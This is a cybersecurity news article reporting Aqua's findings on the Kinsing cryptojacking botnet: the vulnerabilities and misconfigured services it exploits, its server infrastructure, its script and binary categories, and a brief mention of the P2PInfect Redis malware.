The crypto jacking group known as Kinsing has demonstrated an ability to continually evolve & adapt, proving to be a persistent threat by swiftly integrating newly disclosed vulnerabilities to the exploit arsenal & expand its botnet.
The findings come from cloud security firm Aqua, which described the threat player as actively orchestrating illicit crypto-currency mining campaigns since 2019.
Crypto-Mining Botnet
Kinsing (aka H2Miner), a name given to both the malware & the adversary behind it, has consistently expanded its toolkit with new exploits to enrol infected systems in a crypto-mining botnet. It was 1st documented by TrustedSec in Jan. 2020.
In recent years, campaigns involving the Golang-based malware have weaponised various flaws in Apache ActiveMQ, Apache Log4j, Apache NiFi, Apache Tomcat, Atlassian Confluence, Citrix, Liferay Portal, Linux, Openfire, Oracle WebLogic Server, & SaltStack to breach vulnerable systems.
Misconfigured
Other methods have also involved exploiting misconfigured Docker, PostgreSQL, & Redis instances to obtain initial access, after which the endpoints are put into a botnet for crypto-mining, but not before disabling security services & removing rival miners already installed on the hosts.
Analysis by CyberArk in 2021 unearthed commonalities between Kinsing & another malware called NSPPS, concluding that both the strains “represent the same family.”
Kinsing’s attack structure falls into 3 primary categories: Initial servers used for scanning & exploiting vulnerabilities, download servers responsible for staging payloads & scripts, & command-&-control (C2) servers that maintain contact with compromised servers.
Russia
The IP addresses used for C2 servers translate to Russia, while those that are used to download the scripts & binaries span countries like Luxembourg, Russia, the Netherlands, & Ukraine.
“Kinsing targets various operating systems with different tools,” Aqua observed. “For instance, Kinsing often uses shell & Bash scripts to exploit Linux servers.”
“We’ve also seen that Kinsing is targeting Openfire on Windows servers using a PowerShell script. When running on Unix, it is usually looking to download a binary that runs on x86 or ARM.”
Open Source
Another notable aspect of the threat player’s campaigns is that 91% of the targeted applications are open source, with the group mainly singling out runtime applications (67%), databases (9%), & cloud infrastructure (8%).
3 Distinct Categories
An extensive analysis of the artifacts has further revealed 3 distinct categories of programs –
- Type I & Type II scripts, which are deployed post initial access & are used to download next-stage attack components, eliminate competition, evade defences by disabling firewall, terminate security tools like SELinux, AppArmor, & Aliyun Aegis, & deploy a rootkit to hide the malicious processes
- Auxiliary scripts, which are designed to accomplish initial access by exploiting a vulnerability, disable specific security components associated with Alibaba Cloud & Tencent Cloud services from a Linux system, open a reverse shell to a server under the attacker’s control, & facilitate the retrieval of minor payloads.
- Binaries, which function as a 2nd-stage payload, including the core Kinsing malware & the crypto-miner to miner Monero.
Mining Process
The malware, for its part, is engineered to keep tabs on the mining process & share its process identifier (PID) with the C2 server, perform connectivity checks, & send execution results, amongst others.
“Kinsing targets Linux & Windows systems, often by exploiting vulnerabilities in web applications or misconfigurations such as Docker API & Kubernetes to run crypto miners,” Aqua commented. “To prevent potential threats like Kinsing, initiative-taking measures such as hardening workloads pre-deployment are crucial.”
The disclosure comes as botnet malware families are increasingly finding ways to broaden their reach & recruit machines into a network for conducting malicious activities.
Redis Servers
This is best exemplified by P2PInfect, a Rust malware that has been found to exploit poorly-secured Redis servers to deliver variants compiled for MIPS & ARM architectures.
“The main payload is capable of performing various operations, including propagating, & delivering other modules with filenames that speak for themselves like ‘miner’ & ;winminer’,” Nozomi Networks, which discovered samples targeting ARM earlier this year, explained.
“As its name suggests, the malware is capable of performing Peer-to-Peer (P2P) communications without relying on a single Command & Control server (C&C) to propagate attackers’ commands.”
